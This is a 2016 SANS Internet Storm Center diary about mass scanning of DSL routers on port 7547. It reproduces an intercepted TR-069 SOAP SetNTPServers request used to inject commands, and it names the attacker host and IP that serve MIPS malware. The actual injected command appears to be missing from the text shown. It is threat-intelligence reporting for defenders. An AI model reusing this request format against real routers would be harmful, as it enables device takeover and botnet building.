Port 7547 SOAP Remote Code Execution Attack Against DSL Modems, (Mon, Nov 28th)

(this article is “work in progress.” Please let us know if you have any more details to share)


For the last couple days, attack against port 7547 have increased substantially. These scans appear to exploit a vulnerability in popular DSL routers. This issue may already have caused severe issues for German ISP Deutsche Telekom and may affect others as well (given that the US is just “waking up” from a long weekend). Fro Deutsche Telekom, Speedport routers appeared to be the main issue.


According to Shodan,  about 41 Million devices have port 7547 open, making this easily a second Mirai botnet.


Thanks to James for sending us one request he intercepted (added line breaks for readability)


POST /UD/act?1 HTTP/1.1


Host: 127.0.0.1:7547


User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)


SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers


Content-Type: text/xml


Content-Length: 526


 




<NewNTPServer1>




</NewNTPServer1>  


<NewNTPServer2></NewNTPServer2>  


<NewNTPServer3></NewNTPServer3>  


<NewNTPServer4></NewNTPServer4>  


<NewNTPServer5></NewNTPServer5>  


</u:SetNTPServers>


</SOAP-ENV:Body></SOAP-ENV:Envelope>


 


Couple interesting features about this request:


 


  • It appears to exploit a common vulnerability in the TR-069 configuration protocol.
  • The host name used: l.ocalhost.host is NOT localhost ;- ). It currently resolves for me to 212.92.127.146.
  • The file “1” is a MIPS executable. Based on strings, the file includes the SOAP request above, as well as a request to retrieve a file “2”.
  • again, based on strings, the file enables an IP tables firewall rule for port 7547 to protect the router from additional exploits, and it does kill the telnet server.


 




Johannes B. Ullrich, Ph.D.

STI|Twitter|LinkedIn

Source: SANS Internet Storm Center, InfoCON: green @ November 28, 2016 at 07:15AM

0
Share